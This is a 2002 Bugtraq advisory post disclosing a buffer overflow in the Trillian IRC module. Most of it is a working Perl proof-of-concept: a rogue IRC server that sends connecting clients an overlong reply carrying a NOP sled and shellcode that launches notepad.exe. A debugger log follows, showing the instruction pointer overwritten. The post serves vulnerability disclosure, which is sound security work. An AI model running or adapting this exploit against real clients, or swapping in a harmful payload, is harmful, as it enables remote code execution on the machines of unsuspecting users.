[26498] in bugtraq
trillian buffer overflow
daemon@ATHENA.MIT.EDU (John C. Hennessy)
Thu Aug 1 18:26:36 2002
Message-ID: <012001c239a5$b10dbd90$c5798fd1@kibble>
From: "John C. Hennessy" <johnh@charm.net>
To: <bugtraq@securityfocus.com>
Date: Thu, 1 Aug 2002 14:52:11 -0700
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_011D_01C2396B.044A0940"
------=_NextPart_000_011D_01C2396B.044A0940
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
------=_NextPart_000_011D_01C2396B.044A0940
Content-Type: text/plain;
name="trillian.txt"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="trillian.txt"
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Problem:
Trillian's irc modules suffers from a buffer overflow. This allows an =
attacker to execute code of their choice. I have attempted to contact =
the trillian developers about this issue with no success.=20
John C. Hennessy
Information security analyst
- ----------------------Proof of concept code-------------------------
#!/usr/local/bin/perl
#---------------------sicillian.pl-----------------------
#- Proof of concept exploit for trillians irc module. -
#- Tested on trillian 0.73 but i suspect all version -
#- prior maybe exploited as well. -
#- -
#- John C. Hennessy (Information security analyst) -
#--------------------------------------------------------
use Socket;
$|=3D1;
#egg written by UNYUN (http://www.shadowpenguin.org/)
$egg =3D "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
$egg .=3D "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
$egg .=3D "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
$egg .=3D "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
$egg .=3D "\xFD\xE8\xD4\xFF\xFF\xFF";
$egg .=3D "notepad.exe";
$buf =3D "\x90" x 174;
$buf .=3D $egg;
#$buf .=3D "A" x 2;
$buf .=3D "\x41\x41\x41\x41";
#$buf .=3D "B" x 80;
my $host =3D inet_aton("127.0.0.1");=20
my $proto =3D getprotobyname("tcp");
my $port =3D 6667;
my $add_port =3D sockaddr_in($port,$host);
my $ser_sock =3D socket(SOCKET,PF_INET,SOCK_STREAM,$proto) or die =
"Cannot open Socket: $!";
bind(SOCKET,$add_port) or die "\nCould\'t bind to port $port : $!\n ";
my $connection =3D listen(SOCKET,5) or die "Could't listen on $port: $! =
\n";
while(accept(CLIENT,SOCKET)){
# print message from client
#my $ans =3D <CLIENT>;
#print $ans;
#echo message back to client.
print CLIENT "PING :1986115026\r\n001 :irc.random.org trillian =
:$buf\r\n";
}
close(SOCKET);
- ------------------Snippet from debugger attached to =
trillian.exe------------------
Access violation - code c0000005 (first chance)
eax=3D00000000 ebx=3D022738c8 ecx=3D100446d0 edx=3D00000901 =
esi=3D02274e60 edi=3D022738c8
eip=3D41414141 esp=3D0012ca58 ebp=3D01283718 iopl=3D0 nv up ei =
pl nz na po nc
cs=3D001b ss=3D0023 ds=3D0023 es=3D0023 fs=3D0038 gs=3D0000 =
efl=3D00010206
41414141 ?? ???
- =
-------------------------------------------------------------------------=
---------
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>
iQA/AwUBPUhl8zfHYhhTZOYaEQLo8gCg7NHMsCMU+S8LZvFIDdV6R+KKCTYAnjZB
zIVeNwQA8V8j1sWMhi62UAAN
=3Du3Bs
-----END PGP SIGNATURE-----
------=_NextPart_000_011D_01C2396B.044A0940--
